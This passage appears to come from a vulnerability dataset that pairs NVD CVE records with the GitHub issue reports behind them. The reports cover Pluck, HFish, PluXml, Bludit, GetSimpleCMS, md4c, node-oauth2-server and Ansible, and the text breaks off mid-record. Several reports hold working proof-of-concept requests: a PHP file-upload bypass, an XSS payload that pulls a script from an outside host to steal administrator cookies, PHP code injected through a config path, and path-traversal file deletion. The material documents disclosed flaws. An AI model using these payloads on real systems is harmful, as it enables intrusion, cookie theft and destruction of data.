{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/91" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/91" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.11:*:*:*:*:*:*:*", "matchCriteriaId": "B5BD7966-27D7-48D5-8B6B-5A9A8BAB508A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/pluck-cms/pluck/issues/91
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files Proof step1: login -> pages -> manage files upload .htaccess file to turn files/.htaccess to .htaccess.txt ![图片](https://user-images.githubusercontent.com/48854942/71186014-6cec3380-22b7-11ea-9557-3e257ec201ae.png) step2: throw .htaccess.txt into trash ![图片](https://user-images.githubusercontent.com/48854942/71186198-c5bbcc00-22b7-11ea-9b45-563580be1fcf.png) step3: upload shell code ![图片](https://user-images.githubusercontent.com/48854942/71186336-03205980-22b8-11ea-9c50-ce5c86aa4509.png) ``` POST /pluck4711/admin.php?action=files HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------18467633426500 Content-Length: 339 Connection: close Referer: http://127.0.0.1/pluck4711/admin.php?action=files Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij Upgrade-Insecure-Requests: 1 -----------------------------18467633426500 Content-Disposition: form-data; name="filefile"; filename="pass07.php......" Content-Type: application/octet-stream <?php echo phpinfo();?> -----------------------------18467633426500 Content-Disposition: form-data; name="submit" Upload -----------------------------18467633426500-- ``` ![图片](https://user-images.githubusercontent.com/48854942/71186507-4ed30300-22b8-11ea-901f-c4b4e139151c.png) step4: view http://127.0.0.1/pluck4711/files/pass07.php ![图片](https://user-images.githubusercontent.com/48854942/71186548-5eeae280-22b8-11ea-8f13-dd8c4fb4bb61.png)
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
https://api.github.com/repos/pluck-cms/pluck/issues/91/comments
10
2019-12-19T15:37:06Z
2024-11-01T13:16:25Z
https://github.com/pluck-cms/pluck/issues/91
540,390,005
91
1,449
CVE-2020-22481
2020-09-30T18:15:24.367
An issue was discovered in HFish 0.5.1. When a payload is inserted where the password is entered, XSS code is triggered when the administrator views the information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hacklcx/HFish/issues/69" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hacklcx/HFish/issues/69" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hack:hfish:0.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "A86390E8-D92B-42F3-BFA7-25701D161E0C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hacklcx/HFish/issues/69
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacklcx", "HFish" ]
In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks. Insert XSS payload where the password is entered ![image](https://user-images.githubusercontent.com/39295496/76696266-6443a780-66c4-11ea-9ebd-53c834412a67.png) XSS code is triggered when the administrator views the information ![image](https://user-images.githubusercontent.com/39295496/76695974-9f43dc00-66c0-11ea-8229-c2a94608cb27.png) Use the following code to get a cookie. `<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">` ![image](https://user-images.githubusercontent.com/39295496/76696017-94d61200-66c1-11ea-9223-d6bb15fd8758.png)
XSS exists in the information,can get cookie
https://api.github.com/repos/hacklcx/HFish/issues/69/comments
1
2020-03-15T05:35:23Z
2024-05-26T23:23:17Z
https://github.com/hacklcx/HFish/issues/69
581,528,388
69
1,450
CVE-2020-26148
2020-09-30T18:15:26.960
md_push_block_bytes in md4c.c in md4c 0.4.5 allows attackers to trigger use of uninitialized memory, and cause a denial of service (e.g., assertion failure) via a malformed Markdown document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mity/md4c/issues/130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mity/md4c/issues/130" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:md4c_project:md4c:0.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "7F455F90-1697-439A-AD24-E7CFFA64C195", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/mity/md4c/issues/130
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "mity", "md4c" ]
Hi, While fuzzing md4c 0.4.5 with Honggfuzz, I found out that the md_push_block_bytes() function may use uninitialized memory. Attaching a reproducer (gzipped so GitHub accepts it): [test01.md.gz](https://github.com/mity/md4c/files/5298987/test01.md.gz) Issue can be reproduced by running: ``` md2html test01.md ``` ``` ==257142==WARNING: MemorySanitizer: use-of-uninitialized-value #0 0x7f6d02f3e5ed in md_push_block_bytes /home/fcambus/md4c-release-0.4.5/src/md4c.c:4848:12 #1 0x7f6d02f3e5ed in md_start_new_block /home/fcambus/md4c-release-0.4.5/src/md4c.c:4868:25 #2 0x7f6d02f3e5ed in md_process_line /home/fcambus/md4c-release-0.4.5/src/md4c.c:6147:9 #3 0x7f6d02f3e5ed in md_process_doc /home/fcambus/md4c-release-0.4.5/src/md4c.c:6218:9 #4 0x7f6d02f337e5 in md_parse /home/fcambus/md4c-release-0.4.5/src/md4c.c:6295:11 #5 0x7f6d02f6f5c2 in md_html /home/fcambus/md4c-release-0.4.5/src/md4c-html.c:571:12 #6 0x4964a9 in process_file /home/fcambus/md4c-release-0.4.5/md2html/md2html.c:144:11 #7 0x4964a9 in main /home/fcambus/md4c-release-0.4.5/md2html/md2html.c:368:11 #8 0x7f6d02bac0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16 #9 0x41c29d in _start (/home/fcambus/md4c-release-0.4.5/md2html/md2html+0x41c29d) SUMMARY: MemorySanitizer: use-of-uninitialized-value /home/fcambus/md4c-release-0.4.5/src/md4c.c:4848:12 in md_push_block_bytes ```
Use of uninitialized value in the md_push_block_bytes() function
https://api.github.com/repos/mity/md4c/issues/130/comments
5
2020-09-29T12:42:58Z
2020-09-29T21:54:14Z
https://github.com/mity/md4c/issues/130
711,076,103
130
1,451
CVE-2020-18185
2020-10-02T13:15:12.487
class.plx.admin.php in PluXml 5.7 allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluxml/PluXml/issues/321" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluxml/PluXml/issues/321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluxml:pluxml:5.7:*:*:*:*:*:*:*", "matchCriteriaId": "72A017D0-5597-48A0-827E-B3466870F200", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/pluxml/PluXml/issues/321
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluxml", "PluXml" ]
class.plx.admin.php in PluXml allows attackers to execute arbitrary PHP code by modify the configuration file. Source /PluXml/core/lib/class.plx.admin.php line 129~140: ``` if(isset($content['config_path'])) { $newpath=trim($content['config_path']); if($newpath!=PLX_CONFIG_PATH) { # relocalisation du dossier de configuration de PluXml echo PLX_ROOT.$newpath; if(!rename(PLX_ROOT.PLX_CONFIG_PATH,PLX_ROOT.$newpath)) return plxMsg::Error(sprintf(L_WRITE_NOT_ACCESS, $newpath)); # mise à jour du fichier de configuration config.php if(!plxUtils::write("<?php define('PLX_CONFIG_PATH', '".$newpath."') ?>", PLX_ROOT.'config.php')) return plxMsg::Error(L_SAVE_ERR.' config.php'); } } ``` Poc: ``` PluXml/core/admin/parametres_affichage.php [POST]hometemplate=home.php&tri=desc&bypage=5&bypage_tags=5&bypage_archives=5&bypage_admin=10&tri_coms=asc&bypage_admin_coms=10&display_empty_cat=0&images_l=800&images_h=600&miniatures_l=200&miniatures_h=100&thumbs=0&bypage_feed=8&feed_chapo=0&content=&token=6d52373de4b91860547978c69038f2ed1ef7e31a&config_path=data/configuration%27);phpinfo();%23 ``` then visit /PluXml/config.php ![image](https://user-images.githubusercontent.com/9081952/52931358-0771a280-3387-11e9-80f5-984366e9f929.png)
An vulnerability that can get a webshell
https://api.github.com/repos/pluxml/PluXml/issues/321/comments
10
2019-02-18T06:12:50Z
2023-01-20T21:21:52Z
https://github.com/pluxml/PluXml/issues/321
411,316,776
321
1,452
CVE-2020-18190
2020-10-02T14:15:12.657
Bludit v3.8.1 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /admin/ajax/upload-profile-picture.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/978" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/978" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "20051CC0-35E9-4FC7-ABE1-BC02C7CF7656", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/bludit/bludit/issues/978
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
Hi There. I found Bludit v3.8.1 allows remote attackers to delete arbitrary files via /admin/ajax/upload-profile-picture. payload: ``` POST /bludit-3-8-1/admin/ajax/upload-profile-picture HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://127.0.0.1/bludit-3-8-1/admin/new-content X-Requested-With: XMLHttpRequest Content-Length: 494 Content-Type: multipart/form-data; boundary=---------------------------17313137228370 Cookie: vGmm_2132_ulastactivity=5a66isXeZdcONhOLRjRQVgmwjWfexLQ79o0nOIdENOlbV4a1I3eU; vGmm_2132_nofavfid=1; vGmm_2132_home_readfeed=1546482302; vGmm_2132_lastcheckfeed=2%7C1546563267; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1547020074; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1550382234; BLUDIT-KEY=5cqmavvdagu99n16379n6ukdh3 Connection: close -----------------------------17313137228370 Content-Disposition: form-data; name="profilePictureInputFile"; filename="test.php" Content-Type: application/octet-stream cover -----------------------------17313137228370 Content-Disposition: form-data; name="username" ../../bl-content/databases/site -----------------------------17313137228370 Content-Disposition: form-data; name="tokenCSRF" ac77e4f03d9cc78b4e615da278a2fb9d7ce01721 -----------------------------17313137228370-- ``` then the file /bl-content/databases/site.php will be deleted.
Arbitrary File Delete - Security
https://api.github.com/repos/bludit/bludit/issues/978/comments
3
2019-03-05T02:50:16Z
2019-03-29T13:49:45Z
https://github.com/bludit/bludit/issues/978
417,089,224
978
1,453
CVE-2020-18191
2020-10-02T14:15:12.733
GetSimpleCMS-3.3.15 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.3.15:*:*:*:*:*:*:*", "matchCriteriaId": "CFE148BE-5E47-42AB-8660-C0F033D83EC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
Hi There. I found GetSimpleCMS-3.3.15 allows remote attackers to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php payload: ``` GET /GetSimpleCMS-3.3.15/admin/log.php?log=../../../admin/cron.php&action=delete&nonce=babc600c8b8302dfd822f7eba42f846c3ddbb8a5 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://127.0.0.1/GetSimpleCMS-3.3.15/admin/log.php?log=&action=delete&nonce=,babc600c8b8302dfd822f7eba42f846c3ddbb8a5,babc600c8b8302dfd822f7eba42f846c3ddbb8a5 Cookie: vGmm_2132_ulastactivity=5a66isXeZdcONhOLRjRQVgmwjWfexLQ79o0nOIdENOlbV4a1I3eU; vGmm_2132_nofavfid=1; vGmm_2132_home_readfeed=1546482302; vGmm_2132_lastcheckfeed=2%7C1546563267; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1547020074; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1550382234; BLUDIT-KEY=5cqmavvdagu99n16379n6ukdh3; GS_ADMIN_USERNAME=admin; 0e6a4c84dc43b5a41cff73fd930b4137fbb4876d=37cc0e982d3f96291f160dcefed4aedeb2bb6e77; __atuvc=1%7C10 Connection: close Upgrade-Insecure-Requests: 1 ``` then the file /admin/cron.php will be deleted.
Arbitrary File Delete - Security
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1303/comments
8
2019-03-05T08:11:53Z
2019-03-05T18:14:21Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303
417,168,746
1,303
1,454
CVE-2017-18924
2020-10-04T05:15:12.140
oauth2-server (aka node-oauth2-server) through 3.1.1 implements OAuth 2.0 without PKCE. It does not prevent authorization code injection. This is similar to CVE-2020-7692. NOTE: the vendor states 'As RFC7636 is an extension, I think the claim in the Readme of "RFC 6749 compliant" is valid and not misleading and I also therefore wouldn't describe this as a "vulnerability" with the library per se.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://codeburst.io/missing-the-point-in-securing-oauth-2-0-83968708b467" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/oauthjs/node-oauth2-server/issues/637" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/oauthjs/node-oauth2-server/pull/452" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://tools.ietf.org/html/draft-ietf-oauth-security-topics-15" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://tools.ietf.org/html/rfc7636" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://codeburst.io/missing-the-point-in-securing-oauth-2-0-83968708b467" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/oauthjs/node-oauth2-server/issues/637" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/oauthjs/node-oauth2-server/pull/452" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://tools.ietf.org/html/draft-ietf-oauth-security-topics-15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://tools.ietf.org/html/rfc7636" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oauth2-server_project:oauth2-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "7FFE5BBB-4620-482D-A32F-D416AA7E4ADA", "versionEndExcluding": null, "versionEndIncluding": "3.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/oauthjs/node-oauth2-server/issues/637
[ "Exploit", "Third Party Advisory" ]
github.com
[ "oauthjs", "node-oauth2-server" ]
I would like to report several security vulnerabilities that I found while using this OAuth server library. The vulnerabilities and their consequences are listed as following: **Vulnerability 1:** Missing PKCE support for public clients. **_Consequences:_** As specified in RFC-7636 (https://tools.ietf.org/html/rfc7636), public clients (e.g., mobile/desktop apps) using Authorization Code Flow are susceptible to authorization code interception attack and PKCE is recommended to mitigate this attack. Since public clients cannot maintain client-side confidentiality regarding client secrets, such attacks have been noticed in the wild extensively. **Vulnerability 2:** Does not revoke previously issued token if authorization_code is used more than once. **_Consequences:_** As specified in RFC-6749 (https://tools.ietf.org/html/rfc6749#section-4.1.2), If an authorization code is used more than once, the authorization server must deny the request and should revoke all tokens previously issued based on that authorization code. Though OAuth2-server currently denies the request in such cases, it doesn't revoke the tokens issued previously to the client, which leaves the user's resources vulnerable as attackers might exploit the previous tokens to get them. **Vulnerability 3:** Allows fragment in the redirect URI. **_Consequences:_** Many OAuth attacks regarding misuse of redirect uris have been observed in the wild. As specified in the RFC-6749 (https://tools.ietf.org/html/rfc6749#section-3.1.2), authorization server should not allow fragments in the redirect uri as it allows the attackers to exploit the redirect uri and hence intercept the auth_code/token. Any comments or fixes regarding these vulnerabilities? Thank you.
Multiple Security Vulnerabilities in Auth and Token Endpoint
https://api.github.com/repos/oauthjs/node-oauth2-server/issues/637/comments
6
2020-07-16T00:26:02Z
2021-11-21T02:41:44Z
https://github.com/oauthjs/node-oauth2-server/issues/637
657,747,248
637
1,455
CVE-2020-25636
2020-10-05T13:15:13.490
A flaw was found in Ansible Base when using the aws_ssm connection plugin as there is no namespace separation for file transfers. Files are written directly to the root bucket, making possible to have collisions when running multiple ansible processes. This issue affects mainly the service availability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.6, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 5.2, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", 